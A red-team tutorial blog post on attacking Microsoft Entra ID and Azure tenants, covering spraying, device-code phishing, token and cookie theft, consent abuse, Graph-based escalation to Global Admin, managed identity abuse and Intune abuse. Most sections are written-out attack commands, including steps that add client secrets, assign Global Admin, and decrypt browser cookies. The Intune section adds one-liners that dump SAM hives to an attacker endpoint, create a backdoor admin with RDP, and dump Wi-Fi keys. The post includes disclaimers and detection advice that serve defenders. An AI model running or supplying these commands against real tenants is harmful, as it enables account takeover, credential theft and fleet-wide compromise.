Red Team Basics: Entra & Azure Pentesting
Standard disclaimer, same as Part 1: Everything in this post requires authorization. If you're testing against infrastructure you don't own or don't have written permission to test, that's a crime. Don't be stupid. I test against my own Azure tenant under Microsoft's Safe Harbor guidelines as an MSRC researcher. You need equivalent authorization before you touch any of this.
Part 1 covered on-prem AD: NTLM hashes, Kerberos tickets, delegation abuse, all the classics. This is Part 2, and it's a different world. Cloud pentesting doesn't work the same way. There's no LSASS to dump, no NTLM relay, no unconstrained delegation on a file server somebody forgot about. But the attack surface is just as wide. It's just shifted.
Cached credentials on workstations become OAuth tokens and refresh tokens. Group Policy abuse gives way to Conditional Access gaps and overprivileged app registrations. Where you'd have run BloodHound to map AD paths, now it's AzureHound mapping Entra roles and Graph API permissions. The thinking is the same, the tools are different.
Microsoft deprecates endpoints, rotates default behaviors, and patches token flows without changelog entries. Some of what I write here might already be partially mitigated by the time you read it. I'll note where that's the case, but check current docs before you assume something still works exactly as described.
This post references about 15 tools across the kill chain. Rather than front-loading a wall of links, each tool is introduced where it's actually used. There's a full reference table with GitHub links in the appendix.
Initial access: getting into the tenant
Everything starts with a token. You can't query Graph, you can't enumerate the directory, you can't do anything useful until you have an authenticated session in the tenant. That's the first problem to solve. In on-prem AD, initial access usually means compromising a workstation or getting credentials through phishing. In Entra, the paths are different but the goal's the same: get a valid token.
Password spraying
Requires: target domain name. No credentials needed.
Same concept as on-prem, different execution. You're hitting Entra's authentication endpoints with common passwords across many accounts. The tools have gotten pretty specific to Entra's behavior.
MSOLSpray is the classic. It sprays against the Microsoft Online login endpoint and can tell you which accounts exist, which have MFA, and which ones actually authenticate with the password you tried. Worth noting: MSOLSpray is essentially unmaintained at this point (5 commits since 2020, no activity since then). It still works, but if you want something actively maintained, check out EntraSpray instead.
Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\users.txt -Password "Spring2024!" -Verbose
o365spray does the same thing in Python and adds user enumeration as a separate step:
python3 o365spray.py --enum -U users.txt -d contoso.com
python3 o365spray.py --spray -U valid_users.txt -P passwords.txt -d contoso.com --rate 1
Smart lockout defaults to 10 failed attempts with escalating lockout duration. One password per account per hour keeps you under threshold. Lockout responses are your signal to back off.
Here's what o365spray actually looks like against a real tenant. Five candidate usernames in, two confirmed valid in under a second:
python3 o365spray.py --enum -U users.txt -d contoso.onmicrosoft.com
# Output:
[info] Validating: contoso.onmicrosoft.com
[VALID] The following domain appears to be using O365: contoso.onmicrosoft.com
[info] Running user enumeration against 5 potential users
[VALID] admin@contoso.onmicrosoft.com
[VALID] j.smith@contoso.onmicrosoft.com
[INVALID] fake.user@contoso.onmicrosoft.com
[INVALID] helpdesk@contoso.onmicrosoft.com
[INVALID] test.user@contoso.onmicrosoft.com
[info] Valid Accounts: 2
EntraSpray takes it further. Instead of just confirming whether accounts exist, it sprays a password and differentiates the responses through ROPC error codes:
python3 entraspray.py -u valid_users.txt -p "Password123" -d contoso.onmicrosoft.com
# Output:
[*] There are 3 total users to spray.
[*] Now spraying Microsoft Online.
[*] Valid user, but invalid password admin@contoso.onmicrosoft.com
[-] The user fake.user@contoso.onmicrosoft.com doesn't exist.
[-] The user admin@contoso.onmicrosoft.com doesn't exist.
[*] No users compromised.
"Valid user, but invalid password" is AADSTS50126. "Doesn't exist" is AADSTS50034. Two different error codes for two different situations, and Entra hands you that distinction for free. You learn a lot from a spray even when you don't crack anything. Microsoft has been gradually normalizing these error responses in some tenants, returning the same error regardless of whether the user exists. This still works on many tenants as of early 2026, but don't count on it everywhere.
OPSEC: Loud. Every attempt generates a sign-in event in Entra audit logs. Smart lockout tracks failed attempts per-user, and Entra ID Protection flags spray patterns automatically.
Device code phishing
Requires: ability to message the target (email, Teams, etc). No credentials needed.
You start a device code flow, get a code and URL (microsoft.com/devicelogin), and send both to the target. They authenticate normally including MFA. You get their tokens. MFA-satisfied, no technical exploit required.
TokenTactics automates this:
Import-Module .\TokenTactics.psd1
$dc = Get-DeviceCodeFlow -ClientId "d3590ed6-52b3-4102-aeff-aad2292ab01c"
# That ClientId is Microsoft Office, a first-party app
# The user code and URL are in $dc - send those to the target
$dc.user_code
# Poll for completion (once they authenticate, you get tokens)
$tokens = Wait-DeviceCodeFlow -DeviceCode $dc
When the device code flow starts, you get something like this:
user_code : CXBMR7GML
device_code: DAQABAAEAAAD--DLA3VO7QrddgJg7WevrQvnF...
message : To sign in, use a web browser to open the page https://microsoft.com/devicelogin
and enter the code CXBMR7GML to authenticate.
The ClientId matters. Use a first-party Microsoft app ID. The consent screen looks normal, no third-party warning.
Microsoft has been adding mitigations. You can block device code flow in Conditional Access now (under "Authentication flows"). If you're on the defensive side and you're not using device code flow legitimately, block it. Many orgs don't need it.
OPSEC: Quiet. Looks like a normal device code login flow. The only tell is the client ID used, and most orgs don't inspect that in their sign-in logs.
Detection: Sign-in logs show "Device code" as the authentication protocol. Filter for authenticationProtocol "deviceCode" and alert on any usage outside expected service accounts or kiosk devices.
Token theft
Requires: local admin on an Entra-joined or hybrid-joined device, OR access to a machine where the target has authenticated.
If you've already got access to a user's machine, you don't need their password. You need their tokens.
Primary Refresh Tokens (PRTs) are the big one on Azure AD-joined or Hybrid-joined devices. A PRT is a long-lived token that SSOs the user into everything. It carries the user's authentication state, including whether they passed MFA, so anything you do with a stolen PRT satisfies those Conditional Access checks without you ever touching an authenticator app. The PRT refreshes itself silently in the background, which means access persists until someone explicitly revokes it or the device falls out of compliance.
Quick sidebar on what you're actually looking at when you grab one: a PRT is a JWT (JSON Web Token). Three Base64-encoded sections separated by dots. The header says which signing algorithm was used (usually RS256). The payload has the claims that matter: sub (user ID), tid (tenant ID), deviceId, amr (authentication methods, so you can see if MFA was in the session), and exp (expiration). The third section is the cryptographic signature. Paste one into jwt.ms and you can read all of this. Knowing the structure helps you verify you actually grabbed a PRT and not some other token, and the claims tell you what access you're working with.
Extraction with Mimikatz: The classic approach is sekurlsa::cloudap. Run Mimikatz as admin, enable debug privileges, and dump the PRT from memory:
mimikatz # sekurlsa::cloudap
# Output includes:
# * Primary Refresh Token *
# base64(PRT): eyJhbGciOiJSUzI1NiIs...
# Authority: https://login.microsoftonline.com/<tenant_id>
# UserPrincipalName: user@contoso.com
# DeviceId: abcdef12-3456-789a-bcde-f1234567890a
# SessionKey: x12345sessionkey==
2026 caveat: Windows 11 23H2+ enables RunAsPPL by default (on fresh enterprise installs; upgrades may not have it enabled), which blocks Mimikatz from touching LSASS. You'll see an "access denied" on the cloudap dump. On older builds or machines where an admin disabled it, still works fine. But on a modern hardened workstation, this path is dead.
AADInternals as an alternative: Less noisy than Mimikatz. It's a PowerShell module built specifically for Entra, and most AV doesn't flag it the way they flag Mimikatz (which gets caught on signature alone these days). To be clear, the AV concern is about running tools on the target machine post-compromise -- you're dumping credentials from LSASS on the compromised endpoint, not your own box.
Import-Module AADInternals
# Extract PRT and exchange it for access tokens in one step
Get-AADIntAccessTokenForUser -PrimaryRefreshToken
Same result, different detection profile. You still need admin on the box, but you're not dropping a binary that every EDR on the planet has a signature for.
ROADtoken (part of ROADtools) is another option for requesting tokens via the PRT:
roadtx prt -action get
# Use the PRT to get access tokens for Graph, etc.
roadtx prt -action tokens -prt-cookie <cookie_value>
Manual token exchange: Once you have the PRT, you don't need any special tooling to use it. It's just an OAuth refresh token exchange against the v2.0 endpoint. Here's the raw request:
$body = @{
grant_type = "refresh_token"
client_id = "1b730954-1685-4b74-9bfd-dac224a7b894" # Azure AD PowerShell client ID
refresh_token = "<stolen_PRT>"
}
$response = Invoke-RestMethod -Uri "https://login.microsoftonline.com/$tenantId/oauth2/v2.0/token" -Method Post -Body $body
$response.access_token
Note: This is simplified. In practice, the PRT exchange requires a signed JWT request using the device's session key (nonce-based). Tools like ROADtools and AADInternals handle this automatically. A raw PRT pasted into a standard refresh_token grant will fail.
That gives you a fresh access token. From there it's just Graph API calls, az CLI, whatever you want. The PRT itself can keep generating new access tokens until it's revoked, so one successful extraction gives you persistent access.
With an access token in hand, you're calling Graph directly. Read the mailbox, enumerate the directory, check what permissions the token carries. If you grabbed a refresh token, exchange it for access tokens to different resources: Graph, Azure Management, Outlook, Teams. A refresh token is a master key; one token gives you multiple surfaces to attack.
Device binding and replay: The PRT is tied to the device it was issued on. Entra ID checks the device identity, which is a certificate and transport key pair stored under HKLM\SYSTEM\CurrentControlSet\Control\CloudDomainJoin\JoinInfo\<thumbprint>. On devices without TPM (or with TPM disabled), the transport key is software-protected and encrypted with DPAPI, so an attacker with local admin can export both the device certificate and transport key (e.g., via AADInternals) and replay the PRT from another machine. On devices with TPM 2.0, the transport key is hardware-bound and never leaves the chip, so PRT replay from a different machine is not possible. VMs without vTPM, older Windows 10 builds, and devices where TPM attestation was disabled remain vulnerable. Check TransportKeyStatus in the JoinInfo registry key: a value of 3 means TPM-protected, 0 means software-only. Know your target before you spend time on extraction.
Browser cookies: the other token cache
If you have access to a user's machine, browser cookies are one of the easiest token sources. On macOS: Safari stores cookies unencrypted at ~/Library/Cookies/Cookies.binarycookies (parse with Python's binarycookies library). Chrome stores them in SQLite at ~/Library/Application Support/Google/Chrome/Default/Cookies, encrypted with AES-128-CBC using a key from the macOS Keychain ("Chrome Safe Storage", derived via PBKDF2 with salt "saltysalt" and 1003 iterations). Edge uses the same Chromium encryption on macOS. On Windows, both Chrome and Edge protect cookies with DPAPI, which ties decryption to the logged-in user's session, so you need to run as that user or have their credential material.
The cookies you're looking for: ESTSAUTH (session cookie, current session only), ESTSAUTHPERSISTENT (persistent SSO, survives browser close, this is the dangerous one), and x-ms-RefreshTokenCredential (PRT cookie). If you get ESTSAUTHPERSISTENT, you can replay it from a different machine and authenticate as that user without MFA. The cookie already satisfied MFA when the legitimate user logged in.
security find-generic-password -w -a "Chrome" -s "Chrome Safe Storage"
# Key derivation: PBKDF2(keychain_key, salt="saltysalt", iterations=1003)
# Decrypt v10-prefixed values with AES-128-CBC, IV = 16 spaces
# Filter for login.microsoftonline.com domain
Detection: Anomalous token replay from a new device ID that doesn't match the original authentication device triggers Entra ID Protection alerts. Monitor sign-in logs for token replay risk events. Token Protection and CAE, covered in detail below, are the primary defenses.
Token Protection (Proof-of-Possession): This is the real counter to token theft. Token Protection is a Conditional Access grant control that binds tokens to the device that originally requested them using a cryptographic proof-of-possession mechanism. If it's enforced, replaying a stolen token from a different machine just fails. The token includes a device-bound claim that the relying party validates, and you can't forge it without the device's keys. As an enumeration step, check whether the target tenant actually has it turned on. Pull the CA policies and look for tokenProtection in the grant controls, or check for sessionControls.signInFrequency.authenticationType set to require primary refresh tokens with PoP. If you don't see it, stolen tokens replay just fine from any machine. If you do see it, you're stuck working from the original device or finding a way to proxy through it. As of early 2026, Token Protection is still in limited rollout and only covers specific workloads (Exchange Online and SharePoint Online were the first). Most orgs either haven't enabled it or don't know it exists. But it's worth checking before you burn time extracting cookies that won't work.
$policies = Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/identity/conditionalAccess/policies"
$policies.value | Where-Object {
$_.grantControls.authenticationStrength.requirementsSatisfied -eq "mfa" -or
$_.sessionControls.signInFrequency.authenticationType -eq "primaryRefreshToken" -or
$_.grantControls.builtInControls -contains "tokenProtection"
} | Select-Object displayName, state, grantControls
Access tokens from memory: any process that's authenticated to Entra has access tokens in memory. If you can dump the process memory (az CLI, PowerShell with the Az module, Teams), you'll find tokens in there. They're short-lived (usually 60-90 minutes) but that's plenty of time if you know what you're looking for.
# Windows path:
type %USERPROFILE%\.azure\msal_token_cache.json
# Or in PowerShell:
Get-Content "$env:USERPROFILE\.azure\msal_token_cache.json" | ConvertFrom-Json
The az CLI token cache is one of the first things I check on a compromised machine. It's plaintext JSON. No encryption. If someone was logged into az CLI, you've got their refresh tokens sitting right there. Newer versions of az CLI encrypt the token cache using the OS keychain (macOS Keychain, Windows DPAPI). Older installations and some CI/CD environments still store it as plaintext JSON. Check the file - if it's readable, you're in luck.
OPSEC: Quiet locally. Extraction happens on-disk or in-memory with no cloud-side logging. But using stolen tokens from a new IP or device may trigger impossible travel alerts or anomalous token activity in Entra ID Protection.
Detection: Sign-in from a new device or location without MFA re-prompt. Entra ID Protection flags impossible travel and anomalous token activity. Watch for refresh token redemptions from IPs that don't match the original sign-in.
Illicit consent grants
Requires: ability to register an application, or social engineer an admin into granting consent to a malicious app.
This is the OAuth version of "can I borrow your keys?" You create a malicious application registration and trick a user (or admin) into granting it permissions. Once consented, the app has its own credentials and can access data independently of the user's session.
The dangerous permissions to request:
- Mail.Read or Mail.ReadWrite - read their email, set up forwarding rules
- Files.ReadWrite.All - access OneDrive and SharePoint
- User.ReadWrite.All - modify user properties
- Directory.ReadWrite.All - modify directory objects
Most tenants restrict which users can consent to apps (this is configurable under Enterprise Applications > User settings). But I still find tenants where any user can consent to any delegated permission. That's a problem.
Check what your tenant allows:
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/policies/authorizationPolicy" |
Select-Object -ExpandProperty defaultUserRolePermissions |
Select-Object permissionGrantPoliciesAssigned
If that returns "ManagePermissionGrantsForSelf.microsoft-user-default-legacy," users can consent to almost anything. You want it set to "ManagePermissionGrantsForSelf.microsoft-user-default-recommended" at minimum, which restricts consent to verified publishers and low-risk permissions.
Detection: "Consent to application" in the Entra audit log. Look for consent events where the initiator is a non-admin user and the permissions include Mail, Files, or Directory scopes.
At this point you have an authenticated session in the tenant. Maybe it's a sprayed credential, maybe it's a phished token, maybe you pulled it off a compromised machine. Either way, you're in. Now you need to figure out what you're working with.
Enumeration: what a regular user can see
You've got a valid token. That's your foothold. But a token for a standard user doesn't get you much on its own. You need to figure out what's in this tenant and where the interesting attack paths are: who has admin roles, which apps are overprivileged, where the Conditional Access gaps are. The good news is that Entra gives away a lot of this information to any authenticated user by default.
Default user permissions
Requires: any valid user credentials.
Out of the box, a standard Entra user can:
- Read all user profiles (names, email addresses, phone numbers, job titles, managers)
- Read all group memberships
- Read all application registrations
- Read the tenant's organization info
- Read their own authentication methods
- Read all devices registered in the tenant
That's a lot. You can restrict some of this (under Entra > User settings > "Restrict access to Microsoft Entra admin center" and "Users can register applications"), but many tenants leave the defaults.
# All users in the tenant
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/users?`$select=displayName,mail,jobTitle,department"
# All groups
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/groups?`$select=displayName,description,groupTypes"
# All app registrations
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/applications?`$select=displayName,appId,requiredResourceAccess"
# All service principals
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/servicePrincipals?`$top=999"
Once you've got that data, it goes to your tooling. User list feeds into a spray tool for targeted password attacks on high-value accounts. Application list gets fed into your permission checker to find which ones have risky OAuth scopes. All of it stacks into AzureHound so you can query BloodHound for shortest path to Global Admin. The enumeration isn't the attack itself; it's the reconnaissance that tells you which attacks are actually exploitable in this specific tenant.
OPSEC: Quiet. These are standard read operations any authenticated user can make. No alerts fire unless the org has UEBA tuned to flag bulk directory reads.
AzureHound
AzureHound is BloodHound's cloud counterpart. It ingests Entra data and maps out attack paths the same way SharpHound does for on-prem AD. Role assignments, app permissions, group memberships, everything gets turned into a graph you can query for paths to Global Admin.
# You need a valid access token - get one via az login first
az login
$token = (az account get-access-token --resource https://graph.microsoft.com | ConvertFrom-Json).accessToken
# Run AzureHound with the token
./azurehound -j $token list --tenant contoso.onmicrosoft.com -o output.json
The collection output looks like this:
finished listing all users (999 found)
finished listing all groups (469 found)
finished listing all applications (320 found)
finished listing all service principals (847 found)
finished listing all role assignments (214 found)
finished listing all devices (156 found)
collection completed: output.json (7.4 MB)
Once you've ingested the data into BloodHound, the queries are where it gets useful. "Find shortest path to Global Admin" will show you every privilege escalation chain. In the tenants I've tested, there's almost always at least one path, and it's usually through an overprivileged app registration or a service principal with forgotten admin roles. In our test tenant, BloodHound showed 8 Global Admins (including 2 groups), 8 Privileged Role Admins, and multiple service principals with admin roles. The attack paths were immediate.
BloodHound CE: multiple users and groups with paths to Global Administrator. Each line is an exploitable relationship.
Pathfinding view: shortest path from a user to Global Administrator.
OPSEC: Moderate. AzureHound makes a large number of Graph API read calls in a short burst. Each call is a normal read, but the volume and speed can trip UEBA anomaly detection.
ROADtools / ROADrecon
ROADtools is Dirk-jan Mollema's toolkit for Entra enumeration. ROADrecon does the data collection, dumps everything into a local SQLite database, and gives you a web interface to browse through it offline.
roadrecon auth -u user@contoso.com -p 'Password123'
roadrecon gather
# Start the web UI to browse the data
roadrecon gui
2026 caveat: ROADrecon's gather command depends on Azure AD Graph (graph.windows.net), which is fully dead. You'll see this:
Error: 403 Forbidden - graph.windows.net is no longer available
Request ID: a1b2c3d4-5e6f-7890-abcd-ef1234567890
Use roadtx from the same toolkit instead. It uses Microsoft Graph and still works.
I like ROADrecon for offline analysis. You can dump the data once and then spend hours poking through app registrations, service principals, and role assignments without generating any more traffic against the tenant.
What to look for in the data:
- App registrations with Application.ReadWrite.All or RoleManagement.ReadWrite.Directory permissions
- Service principals with admin role assignments that nobody's using interactively
- Stale app registrations with active credentials (client secrets that haven't been rotated)
- Groups used in Conditional Access policies (compromising a member of an excluded group = bypassing CA)
- Users with the "Authentication Administrator" or "Privileged Authentication Administrator" roles (they can reset passwords and MFA for other users)
After enumeration, you have a map of the tenant: who's admin, which apps have dangerous permissions, where the gaps in CA policies are. You know the attack surface. Now you need to use it.
Detection: Large volume of Graph API read calls from a single user or service principal in a short window. Microsoft Graph activity logs (if enabled) show the specific endpoints queried. AzureHound collection is especially noisy with hundreds of sequential API calls.
Conditional Access gaps
Requires: valid credentials. Tests which endpoints enforce MFA.
With a foothold established, probe the tenant's Conditional Access configuration. CA policies are what stand between your token and the resources you want to reach, so understanding the gaps now informs your next moves. Conditional Access is Entra's policy engine: it decides who can access what, from where, on which devices, with what auth strength. It's powerful when configured right. It's usually not configured right.
MFASweep tests which protocols and endpoints enforce MFA and which don't:
Import-Module .\MFASweep.ps1
Invoke-MFASweep -Username "user@contoso.com" -Password "Password123"
MFASweep confirmed the gap on my test tenant. Here's what it found:
| Endpoint | Password-Only Auth? | Protocol |
|---|---|---|
| Microsoft Graph API | YES - no MFA via ROPC | ROPC grant |
| Azure Service Management API | YES - no MFA via ROPC | ROPC grant |
| M365 Web Portal (all user agents) | NO - MFA enforced | Browser |
| Exchange Web Services (Basic Auth) | NO - blocked | Legacy auth |
| ActiveSync (Basic Auth) | NO - blocked | Legacy auth |
Note: ROPC was explicitly enabled on this test tenant. As of late 2025, Microsoft requires explicit enablement of ROPC against first-party apps in many tenant configurations. Production tenants increasingly block ROPC by default - check your tenant's authentication methods policy before assuming these results apply to your target.
The web portal blocks every user agent correctly, legacy auth (EWS, ActiveSync) is blocked, but the API endpoints are wide open via ROPC.
Common gaps I find:
- Legacy authentication not blocked. IMAP, POP3, SMTP AUTH, ActiveSync with basic auth. None of these support MFA. If they're not explicitly blocked in CA, they're a backdoor. Note that Microsoft has been phasing out SMTP AUTH basic auth (the original March-April 2026 enforcement timeline slipped; it's now set for default disable by December 2026). It's dying but not dead yet, and plenty of tenants still have it enabled.
- Platform-specific holes. CA policy says "require MFA on Windows and macOS" but doesn't mention Linux, iOS, or Android. An attacker just changes their user agent or uses a mobile device. I've walked through the front door on more than one engagement just by curling from a Linux box.
- Break-glass accounts excluded from all CA policies but with no sign-in monitoring. That's the design working as intended, right up until someone sprays the break-glass and nobody notices for three weeks.
- Service principal exclusions. Compromise one of the app IDs excluded from CA and you bypass the whole policy stack.
Privilege escalation: user to Global Admin
So you've got your recon dump and a low-priv token. Cool, but you can't actually do anything with that yet. You need to get from "standard user" to Global Admin or equivalent, and the paths usually run through overprivileged apps and forgotten service principals rather than through user accounts directly.
Dangerous Graph API permissions
Requires: compromise of a service principal or app with one of these permissions.
Not all API permissions are created equal. Some of them are effectively Global Admin with extra steps. GraphRunner's OAuth2 grant enumeration found a delegated permission grant with Application.ReadWrite.All and RoleManagement.ReadWrite.Directory on the test tenant. That's a full tenant compromise path just sitting in the grants table, and nobody had noticed.
The next step depends on what permissions are in the grant. If you found Application.ReadWrite.All or RoleManagement.ReadWrite.Directory, authenticate as the service principal using the delegated permissions, then call Graph API to assign yourself Global Admin via RoleManagement.ReadWrite.Directory. One API call from compromised user to full tenant admin. The grant IS the permission; the only question is whether you know how to use it.
Application.ReadWrite.All is the most dangerous permission in Graph. An app with this permission can modify any application registration in the tenant, including adding new credentials to them. If there's an app that already has high privileges, you just add your own client secret to it and authenticate as that app. Instant privilege escalation.
$body = @{
passwordCredential = @{
displayName = "Added by attacker"
endDateTime = "2026-12-31T00:00:00Z"
}
} | ConvertTo-Json -Depth 3
Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/applications/{target-app-id}/addPassword" -Body $body
RoleManagement.ReadWrite.Directory lets you assign Entra directory roles. Including Global Admin. To any account. That's it. Game over if an app has this as an application permission.
$body = @{
"@odata.type" = "#microsoft.graph.unifiedRoleAssignment"
principalId = "<target-user-object-id>"
roleDefinitionId = "62e90394-69f5-4237-9190-012177145e10" # Global Admin role ID
directoryScopeId = "/"
} | ConvertTo-Json
Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments" -Body $body
Other permissions that are worse than they sound:
- AppRoleAssignment.ReadWrite.All lets you grant an app whatever API permissions you want. Pair it with a low-privilege app and you can bootstrap your way up.
- GroupMember.ReadWrite.All - add users to any group, including role-assignable groups tied to admin roles. This one flies under the radar because "managing group members" sounds harmless.
- ServicePrincipalEndpoint.ReadWrite.All. Manage SAML and WS-Fed endpoint URLs on service principals. Redirect federated authentication flows to attacker-controlled endpoints.
Detection: "Add member to role" in the directory audit log. "Update application - Certificates and secrets management" when credentials are added to apps. PIM alerts fire if PIM is configured for directory roles.
App registration abuse
Requires: Application Administrator role, or ownership of the target app.
App registrations are the most commonly overlooked escalation path in Entra. Here's the pattern I see over and over:
- Someone creates an app registration for an automation script three years ago
- They give it high permissions because they need it to work
- They create a client secret with a two-year expiry
- They leave the company
- The app still works, nobody's monitoring it, the secret's still valid
If you compromise an account that owns an app registration (the "owner" property in Entra), you can add new credentials to it without needing any special admin role. The owner has full control over the app.
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/me/ownedObjects/microsoft.graph.application"
# Find all app registrations and their owners
$apps = (Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/applications?`$select=id,displayName,appId").value
foreach ($app in $apps) {
$owners = (Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/applications/$($app.id)/owners").value
Write-Output "$($app.displayName) - Owners: $($owners.userPrincipalName -join ', ')"
}
The same goes for service principal owners. Different object, same concept.
If you own an app, add a new client secret to it immediately and authenticate as the app. Check the app's appRoles to see what permissions it already has. If it already has high permissions, you're done. If not, request Application.ReadWrite.All through the app and self-approve if the compromised user has admin consent capability (Application Administrator, Cloud Application Administrator, or Global Admin). Either way, you now have a persistent credential in a compromised app that nobody's watching.
OPSEC: Moderate. App modification events (addPassword, addKeyCredential) are logged in the Entra audit log, but most orgs don't have alerts on them. The noise level depends entirely on whether anyone is watching.
Detection: "Update application - Certificates and secrets management" in audit log when a new secret or certificate is added. Alert on credential additions to apps that already hold high-privilege permissions.
Service principal escalation
Requires: compromised service principal credentials (client secret or certificate) for an SP with admin roles.
Service principals are the runtime identity of app registrations. When an app authenticates, it authenticates as its service principal. If a service principal has been assigned admin roles (maybe by an admin who was troubleshooting something and forgot to clean up), compromising that app's credentials gives you those roles.
I've seen service principals with Global Admin sitting in tenants for years -the enumeration query below will surface them if they exist in your target. Nobody ever reviews them because they don't show up in the Entra admin center's "Users with admin roles" view. They're not users. They're apps. You have to look specifically at service principal role assignments:
$roleAssignments = (Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments?`$expand=principal").value
$roleAssignments | Where-Object { $_.principal.'@odata.type' -eq "#microsoft.graph.servicePrincipal" } |
Select-Object @{N='App';E={$_.principal.displayName}}, roleDefinitionId, directoryScopeId
Detection: Service principal sign-in logs show authentication events for the SP. "Add member to role" in the directory audit log if the SP assigns roles. Most orgs don't monitor SP sign-ins separately from user sign-ins.
Managed identity abuse
Requires: code execution on an Azure VM, Function App, or other resource with a managed identity.
If you compromise an Azure VM, Function App, Logic App, or any resource with a managed identity, you can request tokens for that identity from the Instance Metadata Service (IMDS). No credentials needed. Just an HTTP request from the machine itself.
# This only works from INSIDE the VM
$response = Invoke-RestMethod -Uri "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com" -Headers @{Metadata="true"}
$token = $response.access_token
# Verify the token works (managed identities are service principals, /me won't work - use /organization)
Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/organization" -Headers @{Authorization = "Bearer $token"}
The permissions depend on what RBAC roles and API permissions were assigned to the managed identity. I've seen Function Apps with Contributor on the entire subscription, or managed identities with Directory.ReadWrite.All in Graph. You can verify this quickly with az role assignment list --assignee <MI-object-id> and by decoding the JWT's roles claim. If you're a developer reading this: give your managed identities the minimum permissions they need. Not Contributor. Not Owner. The specific role for the specific resource.
Once you've got the token, check what it actually carries. If the managed identity has Directory.ReadWrite.All, you can modify any directory object, create service principals, add credentials to apps. If it's Application.ReadWrite.All, you're creating backdoor applications. If it's RoleManagement.ReadWrite.Directory, assign yourself Global Admin directly. Decode the JWT at jwt.ms and look at the roles claim to see exactly what you're working with.
OPSEC: Quiet. IMDS token requests are local HTTP calls that never leave the VM. The subsequent Graph API usage looks like normal workload access from the managed identity's perspective.
Detection: Managed identity sign-ins appear in the service principal sign-in logs. Look for Graph API calls from managed identities that don't normally call Graph, or role assignment operations initiated by a managed identity.
Azure RBAC to Entra escalation
Compromise an Azure VM with Contributor or Owner at subscription scope and you're not stuck in IaaS. Any managed identity on that box is one IMDS call away from Graph API tokens - and if someone granted it Directory.ReadWrite.All, you've just pivoted from infrastructure to the identity plane.
Here's what that IMDS pivot looks like in practice:
# Check what you can do with it (managed identity = SP, use /organization not /me)
Invoke-RestMethod -Uri 'https://graph.microsoft.com/v1.0/organization' -Headers @{Authorization="Bearer $token"}
If that comes back with data instead of a 403, you've got Graph access. Don't bother calling `/me` with a managed identity token though. Managed identities are service principals, not users, so `/me` returns a 404 or error. Use `/organization` to confirm the token works, then decode the JWT itself to see what you have:
$tokenParts = $token.Split('.')
$padded = $tokenParts[1].Replace('-','+').Replace('_','/')
switch ($padded.Length % 4) { 2 { $padded += '==' } 3 { $padded += '=' } }
$payload = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($padded))
$payload | ConvertFrom-Json | Select-Object aud, iss, roles
The `roles` claim tells you exactly what application permissions the managed identity has. If you see Directory.ReadWrite.All, Application.ReadWrite.All, or RoleManagement.ReadWrite.Directory in there, you're looking at a path to Global Admin. Or just paste the token into jwt.ms. This is one of those paths that shows up in environments where developers run workloads on Azure VMs or Function Apps. The RBAC-to-Entra boundary is porous by design, and many orgs aren't monitoring for it.
MicroBurst enumerated the Azure subscription and found 7 storage accounts (two still on TLS 1.0), 5 key vaults (three missing purge protection), 28 app services (most without HTTPS enforcement), and 86 RBAC assignments including multiple Owner and User Access Admin roles at subscription scope.
Intune admin paths
Requires: Intune Administrator role or equivalent.
Intune is an underappreciated escalation vector. If you have Intune Administrator (or even less, depending on the setup), you can deploy PowerShell scripts to any managed device. Those scripts run as SYSTEM. If a Global Admin's workstation is Intune-managed, you can push a script to it that runs in their context.
Let me spell out what SYSTEM-level script execution on every managed device actually means, because "deploy PowerShell scripts" undersells it.
- Exfiltrate SAM hashes from every managed device. Push a script that runs
reg save HKLM\SAM c:\windows\temp\sam.regandreg save HKLM\SYSTEM c:\windows\temp\system.reg, then uploads both files to an attacker-controlled endpoint. Crack offline with hashcat. Most orgs reuse the same local admin password across machines (or did before LAPS), so one cracked hash often unlocks hundreds of devices. - Drop a backdoor local admin + enable RDP.
net user backdoor P@ssw0rd123 /add && net localgroup administrators backdoor /add, thenreg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f. Intune reports which devices ran the script successfully, so you know exactly where you have persistent RDP access. - Persistence note: Because the account is local, it survives domain password resets. You have a backdoor that's completely independent of the AD or Entra identity plane.
Malware distribution is the obvious next step. You don't need a sophisticated delivery mechanism when you have Intune. Write a script that downloads and executes your payload. It runs as SYSTEM, and AV exclusions you've configured through Intune policy (which you also control as Intune admin) will let it through. Microsoft's own device management platform becomes your distribution system. Not one device. All of them, simultaneously.
There's also a quieter play here. A SYSTEM-level script can run netsh wlan show profile name="CorpWiFi" key=clear to dump every saved Wi-Fi password in plaintext, export VPN configurations from the registry, pull client certificates from the machine store, and read saved credentials in Credential Manager. These network access paths don't depend on the user accounts you've already compromised. A Wi-Fi password for the corporate SSID gets you on the physical network from the parking lot.
If you think this is theoretical, look at what happened in March 2026. The Stryker attack (disclosed March 11, 2026) used exactly this path: compromised VPN credentials, pivoted to Global Admin, then issued native Intune wipe commands against 200,000+ devices across 79 countries. No malware. No custom tooling. Just legitimate Intune functionality used with stolen admin credentials. CISA issued an urgent alert on March 18, 2026 because the attack used nothing that endpoint detection would flag.
Microsoft shipped new controls in response. Multi Admin Approval (MAA) is now available for script deployment, device wipes, and role changes. Phishing-resistant MFA (FIDO2 or certificate-based, not basic SMS/push MFA) is required for privileged Intune actions. Script signing enforcement is available as a configurable policy. Scoped administration with scope tags lets you limit which admins can touch which device groups.
